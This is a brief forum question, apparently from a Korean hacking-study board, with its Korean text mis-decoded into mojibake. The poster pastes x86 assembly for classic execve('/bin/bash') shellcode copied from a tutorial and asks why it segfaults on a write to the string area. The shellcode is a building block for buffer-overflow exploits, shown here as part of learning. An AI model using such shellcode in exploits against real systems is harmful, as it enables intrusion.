http://www.hackerschool.org/HS_Boards/data/Lib_system/willy_sc.txt °Á¸¦ º¸°í ½©Äڵ带 ¸¸µé¾îº¸°í Àִµ¥¿ä
.globl main
main:
jmp strings
start:
pop %esi
movb $0x00, 0x7(%esi)
movl %esi, 0x8(%esi)
movl $0x00, 0xc(%esi)
movl $0x0b, %eax
movl %esi, %ebx
lea 0x8(%esi), %ecx
mov 0xc(%esi), %edx
int $0x80
mov $0x01, %eax
mov $0x00, %ebx
int $0x80
strings:
call start
.string "/bin/bash"
°Á¸¦ µû¶óÇߴµ¥ ÀÚ²Ù Segmentation fault°¡ ¶ß³×¿ä
Segmentation fault°¡ ¶ß´Â ÁöÁ¡Àº movb $0x00, 0x7(%esi)ºÎºÐÀÔ´Ï´Ù.
½ºÆ®¸µ ÁÖ¼Ò¸¦ °¡Á®¿Í¼ ±× µÞºÎºÐ¿¡ ¾²·Á°í ÇÏ´Ï ¿¡·¯°¡ ¶ß´Â °Å °°Àºµ¥.. ÀÌ ¿µ¿ª(½ºÆ®¸µÀÌ ÀúÀåµÇ´Â ¿µ¿ª)ÀÌ ¸¶À½´ë·Î ¾µ ¼ö ÀÖ´Â ¿µ¿ªÀÌ ¸Â³ª¿ä?
ȯ°æÀº redhot¸®´ª½º ÀÔ´Ï´Ù. (BOF ¿øÁ¤´ë ¸®´ª½º) |